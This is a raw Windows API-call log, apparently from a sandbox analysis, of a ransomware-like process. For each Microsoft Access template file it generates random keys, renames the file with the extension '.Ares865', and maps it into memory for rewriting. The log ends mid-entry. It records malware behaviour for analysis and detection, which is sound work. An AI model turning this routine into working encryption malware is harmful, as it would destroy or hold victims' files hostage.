[0064.561] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=25550) returned 1 [0064.561] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.562] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.563] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x66d0, lpName=0x0) returned 0x118 [0064.564] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x66d0) returned 0x1a0000 [0064.566] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.567] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.567] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.568] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt.Ares865") returned 83 [0064.568] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\comments.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\comments.accdt.ares865"), dwFlags=0x1) returned 1 [0064.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Comments.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\comments.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.570] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=19079) returned 1 [0064.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.570] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.571] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4d90, lpName=0x0) returned 0x118 [0064.572] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d90) returned 0x1a0000 [0064.574] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.575] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt.Ares865") returned 83 [0064.575] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\contacts.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\contacts.accdt.ares865"), dwFlags=0x1) returned 1 [0064.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Contacts.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\contacts.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.577] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=312388) returned 1 [0064.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.577] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.578] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c750, lpName=0x0) returned 0x118 [0064.579] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c750) returned 0x420000 [0064.591] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.591] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.591] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.591] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.596] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt.Ares865") returned 82 [0064.596] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\details.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\details.accdt.ares865"), dwFlags=0x1) returned 1 [0064.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Details.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\details.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.598] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=20749) returned 1 [0064.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.598] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.599] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5410, lpName=0x0) returned 0x118 [0064.600] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5410) returned 0x1a0000 [0064.602] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.603] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt.Ares865") returned 81 [0064.603] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\dialog.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\dialog.accdt.ares865"), dwFlags=0x1) returned 1 [0064.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Dialog.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\dialog.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.605] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=21465) returned 1 [0064.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.606] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.606] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.606] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.607] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x56e0, lpName=0x0) returned 0x118 [0064.608] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x56e0) returned 0x1a0000 [0064.609] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.610] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.610] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.611] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt.Ares865") returned 81 [0064.611] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\issues.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\issues.accdt.ares865"), dwFlags=0x1) returned 1 [0064.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Issues.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\issues.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.613] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=50784) returned 1 [0064.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.613] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.614] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.614] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.614] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc960, lpName=0x0) returned 0x118 [0064.615] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc960) returned 0x1a0000 [0064.618] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.619] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.619] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.620] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt.Ares865") returned 79 [0064.620] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\list.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\list.accdt.ares865"), dwFlags=0x1) returned 1 [0064.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\List.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\list.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.621] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24690) returned 1 [0064.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.622] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.623] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6380, lpName=0x0) returned 0x118 [0064.624] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6380) returned 0x1a0000 [0064.626] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.627] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt.Ares865") returned 80 [0064.627] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\media.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\media.accdt.ares865"), dwFlags=0x1) returned 1 [0064.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Media.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\media.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.629] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=20690) returned 1 [0064.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.629] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.630] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.630] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.630] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x53e0, lpName=0x0) returned 0x118 [0064.631] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x53e0) returned 0x1a0000 [0064.633] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.634] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt.Ares865") returned 81 [0064.634] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\msgbox.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\msgbox.accdt.ares865"), dwFlags=0x1) returned 1 [0064.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Msgbox.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\msgbox.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.636] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=21605) returned 1 [0064.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.636] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.637] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.637] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.637] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5770, lpName=0x0) returned 0x118 [0064.638] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5770) returned 0x1a0000 [0064.640] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.640] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.641] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt.Ares865") returned 79 [0064.641] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tabs.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tabs.accdt.ares865"), dwFlags=0x1) returned 1 [0064.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tabs.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tabs.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.642] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=24755) returned 1 [0064.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0064.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0064.642] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0064.643] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0064.643] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.643] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x63c0, lpName=0x0) returned 0x118 [0064.644] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x63c0) returned 0x1a0000 [0064.646] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0064.647] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0064.647] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0064.647] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.648] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt.Ares865") returned 80 [0064.648] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tasks.accdt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tasks.accdt.ares865"), dwFlags=0x1) returned 1 [0064.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Tasks.accdt.Ares865" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\tasks.accdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0064.651] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=45845) returned 1 [0064.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0064.651] 